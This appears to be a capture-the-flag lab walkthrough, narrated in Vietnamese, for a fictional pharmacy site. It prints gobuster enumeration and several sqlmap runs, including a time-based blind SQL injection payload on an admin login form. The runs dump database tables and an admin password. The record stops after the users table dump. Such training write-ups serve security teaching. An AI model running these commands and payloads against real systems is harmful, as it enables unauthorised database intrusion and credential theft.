Chemy Lab
Chemy Lab
Our Cyber Incident Response team has received information about illegal sales on a pharmaceutical sales site. The site administrator is reportedly selling banned drugs to different countries, and we believe that contracted companies and customers are hosted on the server. Your task is to infiltrate the server and collect information about the contracted companies and the people associated with them.
What is the contact email address?
==> The Answer : info@chemystore.hv
What is the site administrator’s ip address?
- Tôi dùng gobuster để scan file có trên mục tiêu :
__ __ __ _
/ / / /___ ______/ /___ __(_)_______ _____
/ /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
/ __ / /_/ / /__/ ,< | |/ / (__ ) __/ /
/_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/
┌─[root@hackerbox]─[~]
└──╼ #gobuster dir -u "http://chemystore.hv/" -w /usr/share/wordlists/dirb/common.txt -t 50 -x php,txt,html,bak,old
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://chemystore.hv/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,bak,old
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/.hta (Status: 403) [Size: 278]
/.hta.php (Status: 403) [Size: 278]
/.hta.txt (Status: 403) [Size: 278]
/.hta.html (Status: 403) [Size: 278]
/.hta.bak (Status: 403) [Size: 278]
/.hta.old (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htaccess.bak (Status: 403) [Size: 278]
/.htaccess.old (Status: 403) [Size: 278]
/.htaccess.php (Status: 403) [Size: 278]
/.htaccess.txt (Status: 403) [Size: 278]
/.htaccess.html (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htpasswd.bak (Status: 403) [Size: 278]
/.htpasswd.old (Status: 403) [Size: 278]
/.htpasswd.php (Status: 403) [Size: 278]
/.htpasswd.txt (Status: 403) [Size: 278]
/.htpasswd.html (Status: 403) [Size: 278]
/adminpanel (Status: 301) [Size: 319] [--> http://chemystore.hv/adminpanel/]
/images (Status: 301) [Size: 315] [--> http://chemystore.hv/images/]
/index.php (Status: 200) [Size: 4942]
/index.php (Status: 200) [Size: 4942]
/server-status (Status: 403) [Size: 278]
/uploads (Status: 301) [Size: 316] [--> http://chemystore.hv/uploads/]
Progress: 27684 / 27690 (99.98%)
===============================================================
Finished
===============================================================
┌─[root@hackerbox]─[~]
└──╼ #
- Tôi thấy mình có khả năng injection vào /adminpanel/logon.php
- Tôi dùng sqlmap để liệt kê database :
┌─[root@hackerbox]─[~]
└──╼ #sqlmap -u "http://chemystore.hv/adminpanel/login.php" --data="username=admin&password=admin" --dbs
___
__H__
___ ___["]_____ ___ ___ {1.9.9#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:06:50 /2025-12-10/
[11:06:50] [INFO] resuming back-end DBMS 'mysql'
[11:06:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=innbfj5itve...rvqv06l4k6'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5400 FROM (SELECT(SLEEP(5)))yScI) AND 'pFlF'='pFlF&password=admin
---
[11:06:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: PHP, Apache 2.4.61
back-end DBMS: MySQL >= 5.0.12
[11:06:59] [INFO] fetching database names
[11:06:59] [INFO] fetching number of databases
[11:06:59] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:07:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
5
[11:07:13] [INFO] retrieved:
[11:07:18] [INFO] adjusting time delay to 1 second due to good response times
mysql
[11:07:34] [INFO] retrieved: information_schema
[11:08:31] [INFO] retrieved: performance_schema
[11:09:27] [INFO] retrieved: sys
[11:09:37] [INFO] retrieved: chemy
available databases [5]:
[*] chemy
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[11:09:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/chemystore.hv'
[*] ending @ 11:09:52 /2025-12-10/
┌─[root@hackerbox]─[~]
└──╼ #- Kết quả là có thể injection và ta cũng có thể biết được mục tiêu có 5 database . Mục tiêu ta sẽ là database có tên chemy , giờ thì tìm các bảng của nó:
┌─[root@hackerbox]─[~]
└──╼ #sqlmap -u "http://chemystore.hv/adminpanel/login.php" --data="username=admin&password=admin" -D chemy --tables
___
__H__
___ ___["]_____ ___ ___ {1.9.9#stable}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:10:57 /2025-12-10/
[11:10:57] [INFO] resuming back-end DBMS 'mysql'
[11:10:59] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=o0kgmhu5orc...3kb6u3amll'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5400 FROM (SELECT(SLEEP(5)))yScI) AND 'pFlF'='pFlF&password=admin
---
[11:11:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61, PHP
back-end DBMS: MySQL >= 5.0.12
[11:11:14] [INFO] fetching tables for database: 'chemy'
[11:11:14] [INFO] fetching number of tables for database 'chemy'
[11:11:14] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[11:11:14] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:11:32] [INFO] adjusting time delay to 1 second due to good response times
3
[11:11:32] [INFO] retrieved: login_ip_addresses
[11:12:34] [INFO] retrieved: medicines
[11:12:58] [INFO] retrieved: users
Database: chemy
[3 tables]
+--------------------+
| login_ip_addresses |
| medicines |
| users |
+--------------------+
[11:13:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/chemystore.hv'
[*] ending @ 11:13:13 /2025-12-10/
┌─[root@hackerbox]─[~]
└──╼ #- Kết quả cho ta thấy trong database chemy có 3 bảng , tôi đoán là bảng login_ip_address sẽ là nơi có đáp án cho câu hỏi này :
┌─[root@hackerbox]─[~]
└──╼ #sqlmap -u "http://chemystore.hv/adminpanel/login.php" --data="username=admin&password=admin" -D chemy -T login_ip_addresses --dump
___
__H__
___ ___[.]_____ ___ ___ {1.9.9#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:20:00 /2025-12-10/
[11:20:00] [INFO] resuming back-end DBMS 'mysql'
[11:20:00] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=v96geml1nsk...qclhnufcv4'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5400 FROM (SELECT(SLEEP(5)))yScI) AND 'pFlF'='pFlF&password=admin
---
[11:20:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61, PHP
back-end DBMS: MySQL >= 5.0.12
[11:20:01] [INFO] fetching columns for table 'login_ip_addresses' in database 'chemy'
[11:20:01] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[11:20:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:20:17] [INFO] adjusting time delay to 1 second due to good response times
3
[11:20:17] [INFO] retrieved: id
[11:20:23] [INFO] retrieved: ip_address
[11:20:57] [INFO] retrieved: username
[11:21:19] [INFO] fetching entries for table 'login_ip_addresses' in database 'chemy'
[11:21:19] [INFO] fetching number of entries for table 'login_ip_addresses' in database 'chemy'
[11:21:19] [INFO] retrieved: 28
[11:21:27] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[11:21:29] [INFO] retrieved: 138.125.217.117
[11:22:18] [INFO] retrieved: admin
[11:22:32] [INFO] retrieved: 2
[11:22:35] [INFO] retrieved: 138.125.217.117
[11:23:23] [INFO] retrieved: admin
[11:23:37] [INFO] retrieved: 3
[11:23:40] [INFO] retrieved: 138.125.217.117
[11:24:29] [INFO] retrieved: admin
[11:24:43] [INFO] retrieved: 4
[11:24:47] [INFO] retrieved: 138.125.217.117
[11:25:35] [INFO] retrieved: admin
[11:25:49] [INFO] retrieved: 5
[11:25:52] [INFO] retrieved: 138.125.217^C
[11:26:30] [WARNING] Ctrl+C detected in dumping phase
Database: chemy
Table: login_ip_addresses
[4 entries]
+----+----------+-----------------+
| id | username | ip_address |
+----+----------+-----------------+
| 1 | admin | 138.125.217.117 |
| 2 | admin | 138.125.217.117 |
| 3 | admin | 138.125.217.117 |
| 4 | admin | 138.125.217.117 |
+----+----------+-----------------+
[11:26:30] [INFO] table 'chemy.login_ip_addresses' dumped to CSV file '/root/.local/share/sqlmap/output/chemystore.hv/dump/chemy/login_ip_addresses.csv'
[11:26:30] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/chemystore.hv'
[*] ending @ 11:26:30 /2025-12-10/==> The Answer : 138.125.217.117
What is the name of the company contracted in Italy in connection with the illegal sale of medicines?
- Tôi dump bảng users và nhận được tài khoản mật khẩu quản trị viên :
┌─[root@hackerbox]─[~]
└──╼ #sqlmap -u "http://chemystore.hv/adminpanel/login.php" --data="username=admin&password=admin" -D chemy -T users --dump
___
__H__
___ ___[)]_____ ___ ___ {1.9.9#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:29:13 /2025-12-10/
[11:29:13] [INFO] resuming back-end DBMS 'mysql'
[11:29:13] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=7lsh83vb39q...l3rup844db'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5400 FROM (SELECT(SLEEP(5)))yScI) AND 'pFlF'='pFlF&password=admin
---
[11:29:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61, PHP
back-end DBMS: MySQL >= 5.0.12
[11:29:16] [INFO] fetching columns for table 'users' in database 'chemy'
[11:29:16] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[11:29:17] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:29:32] [INFO] adjusting time delay to 1 second due to good response times
3
[11:29:32] [INFO] retrieved: id
[11:29:38] [INFO] retrieved: password
[11:30:06] [INFO] retrieved: username
[11:30:28] [INFO] fetching entries for table 'users' in database 'chemy'
[11:30:28] [INFO] fetching number of entries for table 'users' in database 'chemy'
[11:30:28] [INFO] retrieved: 1
[11:30:29] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[11:30:31] [INFO] retrieved: T9829A6P5r
[11:31:09] [INFO] retrieved: admin
Database: chemy
Table: users
[1 entry]
+----+------------+----------+
| id | password | username |
+----+------------+----------+
| 1 | T9829A6P5r | admin |
+----+------------+----------+
[11:31:23] [INFO] table 'chemy.users' dumped to CSV file '/root/.local/share/sqlmap/output/chemystore.hv/dump/chemy/users.csv'
[11:31:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/chemystore.hv'
[*] ending @ 11:31:23 /2025-12-10/